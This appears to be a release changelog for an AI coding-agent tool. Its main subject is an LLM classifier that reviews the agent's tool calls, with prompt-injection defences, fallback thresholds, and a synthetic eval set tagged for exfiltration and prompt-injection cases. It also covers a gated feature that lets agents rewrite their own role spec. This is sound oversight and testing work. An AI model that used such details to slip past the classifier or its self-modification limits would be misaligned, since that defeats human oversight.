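        .map((section) => section.text)
        .join("\n\n");
      // Whitespace-only output is treated the same as no block at all.
      cached = block.trim().length > 0 ? block : undefined;
    } catch (error) {
      // Best effort: report and let workers run without the block.
      onBuildFailure(error);
      cached = undefined;
    }
    return cached;
  };
}
```

A failed build is also cached, so a broken filesystem read is attempted once per entry rather than once per worker.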
254
+
255
+ ---
256
+
257
+ ## [0.7.35] - 2026-05-04
258
+
259
+ ### Theme
260
+
261
+ **Hotfix-only release for 3 P0 issues found post-v0.7.34.** No new features. FEATURE_097 (AMA Runner Realtime Todo List) was effectively non-functional in production despite all-green tests because two latent bugs in the parser + prompt prevented the runtime seeding gate from ever firing; FEATURE_092 (Auto Mode Classifier) silently kept using stale provider/model after `/model` swaps. All three are correctness fixes — no protocol or API breakage.
262
+
263
+ ### Fixed
264
+
265
+ - **FEATURE_097 P0 — `coerceManagedProtocolToolPayload` skill_map nesting mismatch** (commit `fcab68c`) — `protocol-emitters.ts` JSON schema (lines 227-236) nests `skill_summary` / `execution_obligations` / `verification_obligations` / `ambiguities` / `projection_confidence` inside a `skill_map` object, but the parser at `managed-protocol.ts:339-355` only read these fields at the top level of the payload. When the LLM emitted the schema-correct nested form, `executionObligations` parsed to `[]`, the runner-level seeding gate (`>= 2 obligations` at `runner-driven.ts:881`) never fired, and the realtime todo plan surface never rendered. Parser now reads top-level OR `skill_map` / `skillMap` (snake + camel), with top-level winning when both are present (back-compat). Also tightened the H0 path in `role-prompt.ts:541` so that ≥2-step tasks at H0_DIRECT MUST go through `emit_scout_verdict` with `executionObligations` populated FIRST — only truly trivial single-step H0 work (typo fix, single-line edit) may complete directly without a verdict. 4-case regression test pinned in `protocol-emitters.test.ts` (snake-case nested, camelCase nested, top-level-wins-on-conflict, defensive non-object skill_map).
266
+ - **FEATURE_097 P0-followup — emit_scout_verdict timing anchor** (commit `32c5205`) — GLM-as-Scout production transcript revealed Scouts treating `emit_scout_verdict` as a *final report* (called after all the work was done) instead of a *plan commitment* (called early, before the work). The TodoListSurface only renders after emit, so late-emit silently breaks FEATURE_097 even when the parser fix correctly reads `executionObligations`. Tightened the Scout role-prompt with an `EMIT TIMING (CRITICAL)` block that (1) reframes `emit_scout_verdict` as plan commitment vs final report, (2) anchors emit to the first 1-2 scoping turns BEFORE main work, (3) lists the report-pattern anti-pattern verbatim, and (4) narrows the trivial-exemption to "exactly ONE distinct execution step" with explicit callout that review/audit/investigation tasks touching ≥2 files/areas/threads MUST emit early even at H0_DIRECT. Pinned `EXECUTION OBLIGATIONS` Heavy block (lines 520-540) untouched so the 64-cell A/B eval pin holds; new TIMING block sits separately so `obligation_coherence` / `simple_overformalization` metrics are unaffected.
267
+ - **FEATURE_092 hotfix-3 — auto-mode classifier defaultProvider/defaultModel staleness** (commit `a1b737a`) — `AutoModeGuardrailConfig.defaultProvider` and `defaultModel` were declared as static `string` fields, captured once at first `getGuardrail()` call. Mid-session `/model` and `/provider` swaps did NOT retarget the auto-mode classifier — it kept calling sideQuery against the original (provider, model) until restart, producing classifier timeouts / errors that escalated to user-confirmation dialogs even though the status bar still read `auto[LLM]`. Compounded in the Ink REPL by a second issue: `runReplApp` declared a top-level `const currentConfig` that was never mutated, so the bootstrap closures `getCurrentProviderName: () => currentConfig.provider` etc. forever returned startup-time values, while the React `useState<CurrentConfig>` (the actual source of truth) was disconnected. Fix has three parts: (1) `AutoModeGuardrailConfig` gains optional `getDefaultProvider?: () => string` / `getDefaultModel?: () => string` fields that take precedence over the static strings inside `buildResolveOptions` — backward compatible since SDK consumers passing `defaultProvider: 'anthropic'` literals still work unchanged; (2) `bootstrapAutoMode` passes live getters wired to `deps.getCurrentProviderName` / `deps.getCurrentModel`, with a warn-log path for empty model; (3) Ink REPL adds `inkCurrentConfigRef` matching the existing `inkAutoModeAskUserRef` / `inkAutoModeEngineChangeRef` pattern — runReplApp-scope ref initialized to `currentConfig`, bootstrap closures read `inkCurrentConfigRef.current.{provider,model,permissionMode}`, component receives `setCurrentConfigRef` prop and syncs via `useEffect(() => setCurrentConfigRef(currentConfig), [currentConfig])`. Readline REPL needed zero changes (its `currentConfig` is a single mutable object and the bootstrap closures pick up live values automatically). 
Reviewed by 2 sub-agents (architect rejected initial union-type proposal in favor of optional getter fields; code-reviewer caught that closures must capture the ref, not the const, and flagged `getCurrentPermissionMode` for the same fix). 4 new regression tests in `guardrail.test.ts` (getter precedence, per-classify re-evaluation, string-only back-compat, partial getter fallback) + 2 in `auto-mode-bootstrap.test.ts`. `claudeMd` and `rules` deliberately remain captured-at-init by design (mid-session edits to `AGENTS.md` / `~/.kodax/auto-rules.jsonc` are rare; restart applies them).
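The `skill_map` nesting fix from the first FEATURE_097 entry boils down to a lookup order. A minimal sketch, assuming only what the entry states (top-level OR `skill_map` / `skillMap`, top-level wins, non-object containers ignored, seeding gate at two or more obligations): the helper names are hypothetical, and accepting a camelCase field name is an additional assumption.

```typescript
function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null && !Array.isArray(value);
}

// Returns the string items of an array, or undefined when the value is not an array.
function readStringArray(value: unknown): string[] | undefined {
  if (!Array.isArray(value)) return undefined;
  return value.filter((item): item is string => typeof item === "string");
}

// Hypothetical stand-in for the obligation-reading part of the parser.
function readExecutionObligationsSketch(payload: Record<string, unknown>): string[] {
  const nested = isRecord(payload.skill_map)
    ? payload.skill_map
    : isRecord(payload.skillMap)
      ? payload.skillMap
      : {};
  return (
    readStringArray(payload.execution_obligations) ?? // top level wins
    readStringArray(payload.executionObligations) ??
    readStringArray(nested.execution_obligations) ?? // schema-correct nested form
    readStringArray(nested.executionObligations) ??
    []
  );
}

// The runner-level gate described in the entry: seed the todo list at >= 2 items.
function shouldSeedTodoListSketch(obligations: readonly string[]): boolean {
  return obligations.length >= 2;
}
```

Before the fix, a payload carrying obligations only under `skill_map` would have produced an empty list here, so the gate could never open.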
268
+
269
+ ---
270
+
271
+ ## [0.7.34] - 2026-05-04
272
+
273
+ ### Theme
274
+
275
+ **FEATURE_097 + FEATURE_110 + FEATURE_112 — three orthogonal v0.7.34 deliveries plus Issue 127/128 fixes.** FEATURE_110 removes the v0.3.1-era legacy plan-mode (path 1) so `PermissionMode="plan"` + `exit_plan_mode` (FEATURE_074, path 2) becomes the sole plan-mode entry. FEATURE_097 adds a Claude Code-style realtime todo plan surface to the AMA Runner — Scout's existing `executionObligations: string[]` is the seed; an in-memory `TodoStore` + new `todo_update` tool drive per-step transitions; a 6-row hard-capped `TodoListSurface` renders under the spinner with auto-anchoring + summary folds + failed-item priority + 5 s post-completion linger. FEATURE_112 lifts the read-only investigation harness ceiling (`deriveTopologyCeiling` +complexity dim, SCOPE COMMITMENT investigation/multi-thread anchors, neutral fan-out copy, ceiling semantics gloss) so deep-investigation tasks can promote to H1 + Evaluator audit instead of staying H0 single-shot.
276
+
277
+ ### Added
278
+
279
+ - **FEATURE_097 — AMA Runner Realtime Todo List** (commit `a974c57`) — Claude-aligned visibility surface for AMA tasks. Wires Scout's existing `executionObligations: string[]` to a brand-new `TodoListSurface` Ink component under the spinner. Six-row hard cap with auto-anchor on the first `in_progress`, failed-item priority promotion, and 5 s linger after the last item closes. New `todo_update` tool injected into Scout/Generator/Planner tool sets; Evaluator drives the list via runner-side auto-handling (accept → all complete; revise → in_progress→failed→pending across the retry boundary; replan → reset). Layer 2 throttle reminder injects `<system-reminder>` after 8 quiet rounds (per-task scope, single-fire until reset by `todo_update` success or role transition). Heavy mini-planner role-prompt variant pinned VERBATIM into Scout after a 64-cell A/B eval (8 alias × 4 case × 2 variant): Heavy delivers +14.5pp obligation coherence, -8.3pp simple-task over-formalization, +4.3pp harness correctness with multistep completeness ceiling-saturated at 100% on both variants. §5 design decisions all implemented: (1) accept/revise/replan dispatch via runner-side wrapper; (2) `TURNS_SINCE_TODO_UPDATE_REMINDER = 8` per-task throttle; (3) Layer 3 heuristic dropped (YAGNI); (4) task-scoped lifecycle (no session persistence); (5) unknown-id self-recovery returns `{ok:false, reason:"... Current valid ids: ..."}`. Layer independence preserved: `repl` imports `TodoItem` only via `@kodax/coding` public re-export. 102 hermetic tests across store / tool / throttle / view-model / surface; 2 release-gate evals pinned (`feature-097-h0-mini-planner-strength.eval.ts` for Heavy variant decision, `feature-097-prompt-behaviors.eval.ts` for the 4 prompt-eval triggers — throttle reminder recovery, unknown-id self-recovery, generator step progression, planner refinement).
280
+ - **FEATURE_112 — Investigation-Scale-Aware Routing (read-scope fix)** (commit `b5ff2b0`) — symmetric counterpart to FEATURE_106's mutation-scope fix. (1) `deriveTopologyCeiling` gains a `complexity` dimension so read-only + complex/systemic tasks can have an H1 ceiling instead of being capped at H0; (2) SCOPE COMMITMENT in the Scout role-prompt extends to investigation-scope (`≥5 files OR ≥8 searches → emit H1`) and multi-thread early-decision (`first 1-2 rounds turn up ≥2 independent threads → dispatch_child_task`) anchors, mirroring the existing mutation-scope rule; (3) `fanoutReason` for `primaryTask=unknown` switches from "No high-value shard class detected" (negative dispatch signal) to "Task scope is unclassified; dispatch_child_task remains available if investigation threads emerge"; (4) `topologyCeiling` field in `decisionSummary` gains a one-line semantic gloss for Scout (`H1_EXECUTE_EVAL` reads "Evaluator can audit your conclusion if you escalate to H1") so the lift in (1) has an inference path. ~21 LoC code + ~80 LoC eval dataset + ~140 LoC tests; eval at `tests/feature-112-read-scope-routing.eval.ts` with 4 cases × 3 alias acceptance.
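The Layer 2 throttle reminder from FEATURE_097 (fire once after 8 quiet rounds, re-arm only on a successful `todo_update` or a role transition) reads naturally as a small state machine. The constant name and value come from the entry above. The state shape and function names are assumptions, and the sketch counts "after 8 quiet rounds" as "on the eighth quiet round".

```typescript
const TURNS_SINCE_TODO_UPDATE_REMINDER = 8;

interface ReminderState {
  quietRounds: number; // rounds since the last successful todo_update
  fired: boolean; // true once the reminder has been injected
}

// Used at task start, after a successful todo_update, and on role transition.
function freshReminderStateSketch(): ReminderState {
  return { quietRounds: 0, fired: false };
}

// Call once per round that ended without a todo_update.
function observeQuietRoundSketch(state: ReminderState): { state: ReminderState; remind: boolean } {
  const quietRounds = state.quietRounds + 1;
  const remind = !state.fired && quietRounds >= TURNS_SINCE_TODO_UPDATE_REMINDER;
  return { state: { quietRounds, fired: state.fired || remind }, remind };
}
```

Keeping the state immutable makes the single-fire property easy to test: once `fired` is set, no sequence of quiet rounds can produce a second reminder until the caller swaps in a fresh state.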
281
+
282
+ ### Removed
283
+
284
+ - **Legacy plan-mode (FEATURE_110, path 1)** (commit `6b1df35`) — deleted `runWithPlanMode` / `listPlans` / `resumePlan` / `clearCompletedPlans` / `PlanStorage` / `planStorage` / `ExecutionPlan` and the `/plan` (`/p`) slash command (with all `/plan on|off|once|list|resume|clear` subcommands). The v0.3.1-era readline + chalk wizard was fully superseded by FEATURE_074's `PermissionMode="plan"` + `exit_plan_mode` tool + Ink-native PlanScrollPanel approval UI (v0.7.20). The two paths could conflict at runtime (e.g. `/plan on` + `PermissionMode="plan"` would block writes via `planModeBlockCheck` after the wizard's `confirm` step had already approved them) and the legacy path's KNOWN_ISSUES backlog (`pendingInputs` not wired) had stayed unaddressed for 2+ versions. Net `~ -603` lines removed, 0 added. **Breaking** for any external SDK consumer importing the listed symbols from `kodax` or `@kodax/repl` — all 7 were undocumented internal exports leaking via `src/index.ts` re-export, not present in README's first-class API table. Existing `~/.kodax/plans/*.json` user data is left in place — users may safely `rm -rf ~/.kodax/plans/` after upgrading; KodaX no longer reads or writes those files.
285
+
286
+ ### Fixed
287
+
288
+ - **Issue 127** (commit `afff423`) — A managed-task checkpoint cleanup race in `runManagedTaskViaRunnerInner` left an orphaned `checkpoint.json` after every successful single-role H0 task, which triggered the "found incomplete task / continue / restart / cancel" prompt on the next REPL query. The fix replaces the fire-and-forget `void writeCheckpoint().then(d => last = dir)` with `pendingCheckpointWrites: Promise[]` awaited via `Promise.allSettled` before the delete; adds `.catch(cleanupRunCheckpoint)` on `Runner.run()` for the abort + LLM-error paths; and moves cleanup ahead of the post-Runner sync block so that exceptions thrown by `buildManagedTaskPayload` / `observer.completed` / `detectScoutSuspiciousSignals` cannot bypass it.
289
+ - **Issue 128** (commit `afff423`) — 9 `__contract-tests__/cap-*.contract.test.ts` end-to-end suites + `orchestration.test.ts` flaked at vitest's 5000ms default under heavy parallel load (211 files concurrently). Bumped per-suite timeout to 15s on those 10 suites only (other 91 contract suites + global `testTimeout` untouched so unit-test perf regressions still surface fast).
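The Issue 127 race is easier to see in code. The sketch below assumes only the pattern the entry names (collect pending checkpoint writes, wait for them with `Promise.allSettled`, then delete). The class and method names are hypothetical, and the filesystem is abstracted behind a callback.

```typescript
// Hypothetical tracker: remembers every in-flight checkpoint write so that
// cleanup cannot run ahead of a write that is still pending.
class CheckpointTrackerSketch {
  private pending: Promise<unknown>[] = [];

  track(write: Promise<unknown>): void {
    this.pending.push(write);
  }

  async cleanup(removeCheckpoint: () => Promise<void>): Promise<void> {
    // Wait for all writes, successful or not, before deleting. With a
    // fire-and-forget write, a late write could recreate the file after
    // the delete and leave an orphan behind.
    await Promise.allSettled(this.pending);
    this.pending = [];
    await removeCheckpoint();
  }
}
```

`Promise.allSettled` is used rather than `Promise.all` so that a failed write still lets cleanup proceed instead of rejecting early while other writes remain in flight.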
290
+
291
+ ---
292
+
293
+ ## [0.7.33] - 2026-05-02
294
+
295
+ ### Theme
296
+
297
+ **FEATURE_092 — Auto Mode Classifier** ships its full release surface. The LLM-reviewed permission tier (Phase 2b classifier core, denial tracker / circuit breaker, model resolver, `AutoModeToolGuardrail` consumer) ships with end-to-end wire-up across both REPL surfaces (readline + Ink), settings / CLI / env override family, slash commands (`/auto-engine`, `/auto-denials`), and a status-bar engine indicator (`Auto[LLM]` green / `Auto[RULES]` yellow) so users can see at a glance whether the classifier downgraded mid-session. The §7 cross-provider release-gate eval (`KODAX_EVAL_AUTO_MODE_CROSS_PROVIDER=1`) verifies 3 cross-provider combos and uncovered a latent bug where `classify()` discarded `sideQuery`'s post-call cost-tracker copy — fixed by threading `setCostTracker` through `ClassifyOptions` so the agent's tracker accumulates classifier calls under `role='auto_mode'`. The canonical `'auto'` permission mode joins `plan` / `accept-edits` (with `'auto-in-project'` retained as a deprecated alias emitting a once-per-session deprecation notice). Status-bar text adopts Title-Case short labels (`Plan` / `Edits` / `Auto[LLM]` / `Auto[RULES]`) matching Claude Code's `permissionModeShortTitle` convention, unified across both readline and Ink surfaces via the new `permissionModeDisplayName` helper.
298
+
299
+ ### Added
300
+
301
+ - **`@kodax/ai sideQuery` API** (Phase 1, commit `a0e3502`) — independent one-shot LLM invocation for features that need a clean call boundary outside the main agent loop. Constraints by design: `tools=[]` hardcoded, text-only output, independent timeout, `querySource` mapped to `TokenUsageRecord.role` for cost bucketing, never throws (all failures produce a result with `stopReason='timeout' | 'aborted' | 'error'`). First consumer is the auto-mode classifier; future consumers include compaction, title generation, SA mutation reflection. 15 tests covering happy path, isolation guarantees, cost tracking, tool-rejection contract, timeout vs caller-abort label fidelity (deterministic `abortCause` tracking eliminates the race), provider-error path.
302
+ - **`@kodax/core GuardrailContext.messages`** (Phase 2a, commit `625fca1`) — optional `messages?: readonly AgentMessage[]` field on `GuardrailContext` so tool-side guardrails can inspect the live conversation transcript without reaching into Runner internals. Runner populates the field at both `beforeTool` and `afterTool` call sites. Backward compatible — existing tool guardrail consumers unaffected.
303
+ - **`@kodax/coding classifier-projection` helpers** (Phase 2b.1) — exports `defaultToClassifierInput(name, input)` (conservative `name + truncated JSON` projection for low-risk structured tools) and `mcpToClassifierInput(server, tool, input)` (hybrid projection: extract action field — method/command/url/query/action priority — then append structural context). 14 tests cover projection format, action priority, structure summarization, edge cases (circular refs, primitives, null).
304
+ - **Auto-rules JSONC loader** (Phase 2b.2, commit `846e7f0`) — three-layer loader (`~/.kodax/auto-rules.jsonc` user, `<project>/.kodax/auto-rules.jsonc` project, `<project>/.kodax/auto-rules.local.jsonc` local) with sha256 fingerprint-based opt-in trust for project rules (`trustProjectRules` / `readTrustState`), hand-rolled string-aware JSONC parser tolerating both `// /* */` comments and trailing commas, "later layer wins position" dedup semantics. 27 tests.
+ - **Classifier core** (Phase 2b.3, commit `5bdbebc`) — `classifier-prompt.ts` (system prompt + neutralized envelope: `<rules>`, `<claude_md>`, `<transcript>`, `<action>` with ASCII `< >` defang to `‹ ›` to disarm prompt-injection inside tool_result payloads), `transcript-strip.ts` (drops assistant text/thinking, preserves tool_use/tool_result; 2KB tool_result cap, 8KB total cap; first user message + recent tail kept), `parse-output.ts` (parses `<block>yes|no</block><reason>…</reason>` with FIRST-tag-wins anti-injection, 500-char reason cap), `classify.ts` orchestrator (sideQuery → parse; failure→decision mapping: end_turn→parsed, timeout/error→escalate, aborted→re-throw `DOMException('AbortError')`, unparseable→fail-closed block, tool_use contract violation→block).
+ - **Denial tracker + circuit breaker** (Phase 2b.4, commit `0c9f8a0`) — pure functional state machines for the engine-downgrade signal: `DenialTracker` (3 consecutive blocks OR 20 cumulative blocks → fallback to rules engine) and `CircuitBreaker` (5 errors / 10-minute sliding window → fallback). 16 tests.
+ - **Classifier model resolver** (Phase 2b.5, commit `0737190`) — 4-layer override chain (env `KODAX_AUTO_MODE_CLASSIFIER_MODEL` → settings.json → CLI flag → main-agent default) with `parseModelSpec("provider:model")` and graceful fallback to the active conversation provider/model. 16 tests.
+ - **`AutoModeToolGuardrail` integration** (Phase 2b.6, commit `ef17c70`) — assembles 2b.2 / 2b.3 / 2b.4 / 2b.5 into a single `ToolGuardrail` (FEATURE_085) consumer. Engine starts at the configured value (`'rules'` | `'llm'`); on each tool call it post-records the verdict and downgrades to `'rules'` for the *current* call when the threshold crosses (so the same call that crosses the line is the first to be served by the cheaper engine). Test-only accessors `getEngineForTest` / `getStatsForTest` / `setProviderForTest` for hermetic test wiring. 11 tests.
+ - **`PermissionMode` 'auto' canonical + 'auto-in-project' alias** (Phase 2b.7a, commit `2866f26`) — adds `'auto'` as the canonical permission mode and keeps `'auto-in-project'` as a deprecated alias. New helpers `CANONICAL_PERMISSION_MODES`, `isAutoMode(m)`, `canonicalizePermissionMode(m)` for boundary-call canonicalization. `normalizePermissionMode` does NOT auto-canonicalize so callers can preserve the user's spelling for diagnostic output. 7 tests.
+ - **Auto-mode classifier eval dataset** (Phase 2b.9) — `benchmark/datasets/auto-mode-classifier/cases.ts` 14 synthetic cases across 6 tags (`exfiltration` ×2, `remote-exec` ×2, `dest-irrev` ×2, `dep-poisoning` ×1, `prompt-inject` ×2, `legit-work` ×5). `cases.test.ts` (8 hermetic shape tests, no LLM). `tests/auto-mode-classifier.eval.ts` skip-by-default Stage 0 stub — opt-in live measurement via `KODAX_EVAL_AUTO_MODE_LIVE=1`; per-alias TP/FP/escalate counters; quality thresholds NOT enforced yet (gated to Stage 1 post-pilot per `benchmark/datasets/auto-mode-classifier/README.md`).
+ - **`@kodax/coding` public surface** — auto-mode classifier modules exported under the `// FEATURE_092` heading: `classify`, `loadAutoRules` family, `buildClassifierPrompt`, `stripAssistantText`, `parseClassifierOutput`, denial-tracker family (renamed at the index boundary to `createAutoModeDenialTracker` / `recordAutoModeBlock` / etc. to avoid collision with the FEATURE_044/045 input-signature `DenialTracker` already exported), circuit-breaker family, model-resolver family, `createAutoModeToolGuardrail`, plus all corresponding types.
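
The thresholds in the denial tracker and circuit breaker entry above can be sketched as pure state transitions. This is a minimal illustration, not the shipped code: every name here (`DenialState`, `recordVerdict`, `BreakerState`, `recordError`, `isTripped`) is hypothetical, and the sketch assumes that an allowed call resets the consecutive-block streak.

```typescript
// Hypothetical shapes; the real DenialTracker / CircuitBreaker types are not shown in the changelog.
interface DenialState {
  readonly consecutive: number;
  readonly cumulative: number;
}

const CONSECUTIVE_LIMIT = 3; // "3 consecutive blocks"
const CUMULATIVE_LIMIT = 20; // "20 cumulative blocks"

const emptyDenials: DenialState = { consecutive: 0, cumulative: 0 };

// Pure transition: a block bumps both counters; an allow resets only the streak (assumption).
function recordVerdict(state: DenialState, blocked: boolean): DenialState {
  return blocked
    ? { consecutive: state.consecutive + 1, cumulative: state.cumulative + 1 }
    : { consecutive: 0, cumulative: state.cumulative };
}

function shouldFallBackOnDenials(state: DenialState): boolean {
  return state.consecutive >= CONSECUTIVE_LIMIT || state.cumulative >= CUMULATIVE_LIMIT;
}

const ERROR_LIMIT = 5; // "5 errors"
const WINDOW_MS = 10 * 60 * 1000; // "10-minute sliding window"

interface BreakerState {
  readonly errorTimestamps: readonly number[];
}

const closedBreaker: BreakerState = { errorTimestamps: [] };

// Drop timestamps that have slid out of the window, then append the new error.
function recordError(state: BreakerState, nowMs: number): BreakerState {
  const recent = state.errorTimestamps.filter((t) => nowMs - t < WINDOW_MS);
  return { errorTimestamps: [...recent, nowMs] };
}

function isTripped(state: BreakerState, nowMs: number): boolean {
  const recent = state.errorTimestamps.filter((t) => nowMs - t < WINDOW_MS);
  return recent.length >= ERROR_LIMIT;
}
```

Because each transition returns a new value instead of mutating, a caller can keep the previous state around for logging and compare it with the next one.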
+
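
The classifier-core entry above mentions bracket defanging, first-tag-wins parsing, a 500-character reason cap, and a fail-closed default. A minimal sketch of those four ideas follows; the names (`defang`, `parseVerdict`, `shouldBlock`, `ClassifierVerdict`) are hypothetical and the real `parse-output.ts` may differ, for instance in how it treats malformed tags.

```typescript
// Hypothetical names throughout; only the tag format and the caps come from the changelog.
type ClassifierVerdict =
  | { kind: "parsed"; block: boolean; reason: string }
  | { kind: "unparseable" };

const REASON_CAP = 500; // 500-char reason cap

// Replace ASCII angle brackets so embedded payloads cannot form real tags.
function defang(text: string): string {
  return text.replace(/</g, "‹").replace(/>/g, "›");
}

function parseVerdict(raw: string): ClassifierVerdict {
  // Non-global regexes stop at the first match, so a later, injected
  // <block> or <reason> tag cannot override the first one.
  const block = /<block>\s*(yes|no)\s*<\/block>/i.exec(raw);
  if (block === null) return { kind: "unparseable" };
  const reason = /<reason>([\s\S]*?)<\/reason>/i.exec(raw);
  return {
    kind: "parsed",
    block: (block[1] ?? "").toLowerCase() === "yes",
    reason: (reason?.[1] ?? "").trim().slice(0, REASON_CAP),
  };
}

// Fail closed: anything that cannot be parsed is treated as a block.
function shouldBlock(verdict: ClassifierVerdict): boolean {
  return verdict.kind === "unparseable" ? true : verdict.block;
}
```

Defanging is applied to untrusted payloads before they are placed in the prompt envelope, while parsing is applied to the model's reply; the two steps guard opposite directions of the same boundary.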
+ ### Wired through
+
+ The Phase 2b roadmap shipped in three waves; what follows is the live surface as of release:
+
+ - **Phase 2b.7b — settings / CLI / env wire-up + Runner registration (shipped)**: `KodaXOptions.guardrails`, `KodaXToolExecutionContext.guardrails`, child-executor guardrail propagation (FEATURE_085 `dispatch_child_task`), `bootstrapAutoMode` factory wired in both the readline REPL (`packages/repl/src/interactive/repl.ts`) and the Ink REPL (`packages/repl/src/ui/InkREPL.tsx`), surface-agnostic `askUser` injection (readline wraps `confirmToolExecution`, Ink wraps `showConfirmDialog`), `~/.kodax/config.json` `autoMode.{engine,classifierModel,timeoutMs}` reader, `KODAX_AUTO_MODE_*` env override family, `auto-in-project` deprecation emitter (once-per-session in both REPLs), `/auto` slash command switches to canonical `'auto'` (no longer the deprecated `'auto-in-project'` alias).
+ - **Phase 2b.8 — slash commands + REPL status bar (shipped)**: `/auto-engine [llm|rules]` and `/auto-denials` slash commands wired in both readline and Ink callbacks (`getAutoModeStats`, `setAutoModeEngine`); status-bar engine indicator (`auto[LLM]` green / `auto[rules]` yellow) applied uniformly across the readline status bar (`status-bar.ts`) and the Ink status-bar view-model (`view-models/status-bar.ts`).
+ - **§7 cross-provider validation (shipped)**: `tests/auto-mode-cross-provider.eval.ts` — opt-in via `KODAX_EVAL_AUTO_MODE_CROSS_PROVIDER=1`; 3 cross-provider combos (`ds/v4flash → kimi`, `kimi → zhipu/glm51`, `zhipu/glm51 → ds/v4flash`); asserts the classifier provider lands in the cost tracker under `role='auto_mode'`. Run-through uncovered a latent bug where `classify()` discarded `sideQuery`'s post-call tracker copy (immutable pattern) — fixed by threading `setCostTracker` through `ClassifyOptions` so the agent's tracker accumulates classifier calls.
+
+ The dataset's Stage 1 (`benchmark/datasets/auto-mode-classifier/README.md`) gates the LLM-engine certification on the 8-alias × 70-cell synthetic pilot — see `benchmark/results/2026-05-02T06-54-27Z-auto-mode-classifier-pilot/`. Hard quality thresholds (TP ≥ 95%, FP ≤ 10%, P90 ≤ 5s) graduate to `expect.fail` post-pilot in v0.7.34+ once defaults stabilize. **Deferred to use-it-and-fix:** §5 downgrade-chain UX validation (3 consecutive blocks → engine flip → user prompt) — manual exercise rather than automated since the chain is user-perception-bound.
+
+ **ACP scope note (v0.7.33)**: the canonical `'auto'` permission mode is **not** exposed over ACP. ACP clients see the legacy 3-mode set (`plan`, `accept-edits`, `auto-in-project`) — see code comment on `ACP_PERMISSION_MODE_IDS` in `src/acp_server.ts`. The classifier requires an interactive `askUser` surface (readline / Ink confirm dialog) and `KodaXAcpServer.requestPermissionFromClient` has no protocol slot for the classifier-escalate `<reason>` payload yet; an ACP-native classifier-escalate channel lands in a follow-up version. Until then, ACP's `'auto-in-project'` continues with the pre-v0.7.33 rules-only semantics.
+
+ ### Changed (BREAKING)
+
+ - **`LocalToolDefinition.toClassifierInput: (input: unknown) => string`** is now a **required** field (Phase 2b.1). Authors of custom tools (extensions via FEATURE_034, runtime construction via FEATURE_087) must supply a projection that the auto-mode classifier evaluates. Three-tier strategy:
+ - **Zero-risk (read-only / structural):** return `''` — Tier 1 short-circuits the classifier entirely (zero token cost). Examples: read, grep, glob, scaffold/validate/test of construction tools.
+ - **High-risk (mutation / network / exec / spawn):** custom projection surfacing the risk-bearing field. Examples: `Bash: ${i.command}`, `Write ${i.path} (${i.content.length} bytes)`, `WebFetch ${i.url}`, `ActivateTool: ${name}@${version}`.
+ - **Low-risk structured:** call `defaultToClassifierInput(name, input)` (one-line helper).
+
+ All 41 built-in tools migrated. The construction runtime falls back to `defaultToClassifierInput(artifact.name, input)` for constructed tools that don't yet declare a custom projection (a future artifact-schema field will let authors override). External extension authors must add the field to their `LocalToolDefinition` literals — see JSDoc on the field and the example collection at the top of `packages/coding/src/tools/classifier-projection.ts` for guidance.
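
For extension authors, the three tiers above might look like the following. This is a sketch under stated assumptions: `ToolSketch` models only the one required field rather than the full `LocalToolDefinition`, `defaultProjectionSketch` is a hypothetical stand-in for `defaultToClassifierInput` (its real truncation length and format are not given here), and the tool names are illustrative.

```typescript
// Stand-in for LocalToolDefinition; only the field discussed above is modelled.
interface ToolSketch {
  name: string;
  toClassifierInput: (input: unknown) => string;
}

// Read a string field from an untyped tool input without throwing.
function stringField(input: unknown, key: string): string {
  if (typeof input !== "object" || input === null) return "";
  const value = (input as Record<string, unknown>)[key];
  return typeof value === "string" ? value : "";
}

// Hypothetical stand-in for defaultToClassifierInput: tool name plus truncated JSON.
function defaultProjectionSketch(name: string, input: unknown, maxLen = 200): string {
  let json: string;
  try {
    const serialized: string | undefined = JSON.stringify(input);
    json = serialized ?? String(input);
  } catch {
    json = "[unserializable]"; // e.g. circular references
  }
  const clipped = json.length > maxLen ? `${json.slice(0, maxLen)}...` : json;
  return `${name} ${clipped}`;
}

// Tier 1, zero-risk: an empty projection short-circuits the classifier.
const readTool: ToolSketch = { name: "read", toClassifierInput: () => "" };

// High-risk: surface the risk-bearing field directly.
const bashTool: ToolSketch = {
  name: "bash",
  toClassifierInput: (input) => `Bash: ${stringField(input, "command")}`,
};

// Low-risk structured: delegate to the default projection.
const todoTool: ToolSketch = {
  name: "todo_write",
  toClassifierInput: (input) => defaultProjectionSketch("todo_write", input),
};
```

The high-risk projection deliberately shows the command verbatim rather than a summary, since the classifier can only judge what the projection exposes.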
+
+ ---
+
+ ## [0.7.32] - 2026-05-02
+
+ ### Theme
+
+ Two features close out v0.7.32 and the Plan B roadmap. **FEATURE_090** is the roadmap endpoint and the highest-risk feature in the self-construction series: it lets a constructed agent rewrite **itself**, gated by 5 reflexive stability guarantees (deferred resolver swap protecting the in-flight `Runner.run` reference; LLM diff summary advisory + force-ask-user dialog showing raw prev/next manifests; modification budget hardcoded at N=3 cross-run; chained rollback re-running admission; append-only audit log with diff hash). **FEATURE_107** is a data-driven architecture clean-up: the v0.7.16 design assumption "Planner → fresh Generator session + plan artifact" was never implemented in the v0.7.26 Layer A rewrite (all handoffs are `kind:'continuation'` with `inputFilter:undefined`). The 18-case `h2-plan-execute-boundary` eval (1 real-replay + 17 hand-curated, after Pool 3 archaeology demoted half the original candidate pool) reframed the question to A=current full-transcript vs B=add `inputFilter` to realize v0.7.16 intent. Across 6 alias × 3 cases the two paths produced **identical** Generator outcomes (0pp delta) — variant B is deleted, full-transcript stays, and the v0.7.16 design intent is formally retired. Two production changes ship from FEATURE_107's empirical findings: per-context-window adaptive `triggerPercent` (≤200K → 60%, ≤256K → 65%, ≤500K → 70%, >500K → 75%) because short-window models hit attention degradation around 120K and the legacy 75% default fires too late; and Generator reasoning-discipline (Claude Code's verbatim bidirectional bar for `emit_handoff`) hardcoded into `role-prompt.ts` after boundary suite confirmed it harmless across 6 aliases.
+
+ ### Added
+
+ - **FEATURE_090 — Self-Construction Tier 4: Agent Self-Modifying Role Spec**: A constructed agent (kind=`agent`, authored via `stage_agent_construction`) can now propose a new version of itself by calling the new internal tool `stage_self_modify`. The path enforces 5 stability guarantees:
+ - **G1 deferred resolver swap** — `agent-resolver.ts::_pendingSwap` queue holds activated-but-not-live entries; the in-flight `Runner.run` keeps the prior `Agent` reference until the conversation turn ends. REPL drains the queue at the `runAgentRound` `finally` boundary so the new version takes effect on the next turn (works for success, abort, and error paths).
